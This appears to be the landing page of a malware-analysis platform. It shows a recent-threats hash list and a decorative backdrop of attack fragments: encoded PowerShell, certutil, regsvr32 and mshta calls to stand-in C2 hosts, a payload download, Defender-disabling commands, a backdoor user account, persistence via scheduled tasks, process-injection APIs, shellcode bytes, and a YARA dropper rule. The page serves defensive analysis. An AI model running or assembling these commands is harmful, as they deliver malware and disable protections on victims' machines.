ZIP · DOCX · XLSX
OLE · CFB · Container
VBA Macro · P-Code
Base64 · XOR · Obfusc.
Shellcode · Loader
// MALICIOUS PAYLOAD
@echo off
cmd /c powershell -nop -w hidden
-enc JABzAD0ATgBlAHcALQBP...
certutil -decode drop.b64 out.exe
regsvr32 /s /n /u /i:http://c2.re
mshta http://evil.re/stage.hta
rule Malware_Dropper {
strings:
$mz = { 4D 5A ?? ?? }
$ps = "powershell" nocase
$b64 = /[A-Za-z0-9+\/]{40,}/
condition: all of them
}
50 4B 03 04 14 00 06 00
// ZIP magic — outer container
Set sh=CreateObject("WScript.Shell")
sh.Run "powershell -ep bypass",0,True
Set x=CreateObject("MSXML2.XMLHTTP")
x.Open "GET", strUrl, False
wscript //B //NoLogo drop.vbs
ShellExecuteA
WinExec
CreateProcessA
InternetOpenA
URLDownloadToFile
Function Deobf(s As String)
For i = 1 To Len(s)
r = r & Chr(Asc(Mid(s,i,1))
Xor &H41)
Next i : Deobf = r
End Function
Invoke-Expression $decoded
[Assembly]::Load($buf).EntryPoint
Add-MpPreference
-ExclusionPath
$env:APPDATA
Set-MpPreference
-DisableRealtime $true
...\CurrentVersion\Run
$b=[Convert]::FromBase64String(
"JABzAD0ATgBlAHcALQBPAGIA")
%COMSPEC:~0,1%%COMSPEC:~9,1%
Chr(112)&Chr(111)&Chr(119)
agBlAGMAdAAoACcAaAB0AHQA
cAB0ADoALwAvAGUAdgBpAGwA
cgBlAC4AcgBlAC8AcABhAHkA
XOR key: 0x41
ROT13 + base64
RC4 stream cipher
net user backdoor
P@ss1234! /add
schtasks /create
/sc minute /mo 5
\x48\x31\xC0\x48\xB8\x63\x61
\x6C\x63\x00\x50\xFF\xD0\x90
VirtualAllocEx
WriteProcessMemory
CreateRemoteThread
NtUnmapViewOfSection
GetProcAddress
LoadLibraryA
4D 5A 90 00 03 00 FF FF
0xfc,0x48,0x83,0xe4,0xf0,0xe8
0xcc,0x00,0x00,0x00,0x41,0x51
0x41,0x50,0x52,0x51,0x56,0x48
invoke-webrequest -uri $c2
-outfile $env:TEMP\svc32.exe
Start-Process -WindowStyle Hidden
AAAA%p%p%p%p%x.%x.%x
ZwQueryInformationProcess
// THREAT INTELLIGENCE PLATFORM
Unlock the future of
Extended Malware
Analysis.
Advanced static & structural analysis for cybersecurity experts.
200+
Formats
YARA
Rule Engine
AI
Powered
// Recent threats
2986bdb8dd1f62b11c1c57e58f00ae50
Portable Executable file
7 hours ago
Go Loader (Factory-v3)
c6077f50c2ccb6e4b9263222adcc223e
Portable Executable file
7 hours ago
6e4188eab774c2d0641bfcb032f19799
Portable Executable file
10 hours ago
Go Loader (Factory-v3)
569d13d8462e60b7700d09c330f95653
Portable Executable file
12 hours ago
Go Loader (Factory-v3)
fef317a664f777afc944d8e4c6ab82dd
VBScript file
12 hours ago
1745d48bb7b452ce7c6a480f2aefffb1
PowerShell Script
13 hours ago
f88819dc3e07a82e29a076572e67c887
Portable Executable file
16 hours ago
Go Loader (Factory-v3)
4f088f1bc965ff0e11a9c75e4ee3f97a
Portable Executable file
16 hours ago
Go Loader (Factory-v3)
a0c412cb016d99675c5728fc38175fbd
Portable Executable file
16 hours ago
Go Loader (Factory-v3)
b08c40a5d165172f3d7311f184f21d4d
Portable Executable file
16 hours ago
Go Loader (Factory-v3)
e92767b3ce96ad130fea9b4284a670e2
VBScript file
16 hours ago
c329d60ce2651f116dad8d60f31a568b
VBScript file
16 hours ago
99bbe7343d5ed6db873068ef62d3a317
VBScript file
16 hours ago
59ad6a06b9dbfd7661d9d7fc2f931ec5
PowerShell Script
16 hours ago
d879d463e16d974fc802c8b98e8b226d
PowerShell Script
16 hours ago
bb537347916ea107636b3c8c1cd5aa94
PowerShell Script
16 hours ago
f9f0bfbbfa7c25d881a8e6fc1f6175fc
PowerShell Script
16 hours ago
be2d83c164e9aa9adc12fefb9ff31647
Portable Executable file
16 hours ago
Go Loader (Factory-v3)
d1b18404eb25fb66030bd1e426a639c5
Portable Executable file
16 hours ago
56902c152c8894d6fb18212270fa1d49
PowerShell Script
17 hours ago
Connect & explore more →
Sign in
New user?
Create an account →
Email address
Continue
or
Continue with Google
Continue with Microsoft
MALVA.RE · SECURE ACCESS · v2
An error has occurred. This application may no longer respond until reloaded.
Reload
🗙